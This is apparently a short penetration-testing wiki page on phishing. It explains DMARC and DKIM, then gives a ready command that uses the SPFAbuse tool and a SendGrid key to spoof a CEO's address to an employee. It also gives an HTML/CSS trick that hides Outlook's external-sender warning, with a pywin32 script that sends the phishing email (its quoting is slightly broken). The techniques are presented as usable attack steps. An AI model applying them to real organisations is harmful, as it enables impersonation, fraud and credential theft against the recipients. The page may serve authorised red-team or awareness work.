Email Spoofing & Warning Disabling

- Email Spoofing

DMARC (Domain-Based Message Authentication, Reporting, and Conformance) is an email authentication protocol aimed at empowering domain owners to safeguard their domains against unauthorized use, such as email spoofing. It provides a mechanism for specifying how email receivers should handle messages from the domain, including whether to deliver, quarantine, or reject them based on authentication results.

DomainKeys Identified Mail (DKIM) is a cryptographic email authentication protocol that enables organizations to assert accountability for message transmission. DKIM adds a digital signature to outgoing messages, which can be verified by email service providers. This verification ensures that the message has not been altered during transit and originated from an authorized sender associated with the specified domain.

If your target doesn’t enforce DMARC, you can spoof email:

https://github.com/Mr-Un1k0d3r/SPFAbuse

python SPFAbuseSMTP.py <API-KEY> ceo@target.com victim@target.com "SPF are not enough" email.txt

You need a sendgrid key which is free to register limited to 10000 emails.

When integrating marketing email solutions, companies often need to include them in their Sender Policy Framework (SPF) records to ensure email delivery. This is because SPF checks whether the sending server is authorized to send emails on behalf of a particular domain. By registering an account on the same marketing solution and sending emails within the associated IP range, companies establish a legitimate connection between their domain and the marketing solution's servers. This alignment helps maintain email deliverability and avoids potential issues with SPF authentication.

- Email Warning Disabling

If the phishing email is comming from an external domain, it usually loads a warning.

This can be bypassed sending the phishing email in HTML format and add the following piece of code:

<style>body { display: none } .phish { display: block !important }</style>
<div class="phish">Your Phishing email content goes here</div> 

This can be easily tested locally using pywin32 on Windows and Outlook:

import win32com.client as win32
outlook = win32.Dispatch('outlook.application')
mail = outlook.CreateItem(0)
mail.To = verga@gmail.com'
mail.Subject = ‘Phishing test'
mail.HTMLBody = """
<style>body { display: none } .phish { display: block !important }</style>
<div class="phish">Your Phishing email content goes here</div>
"""
mail.Send()

Last updated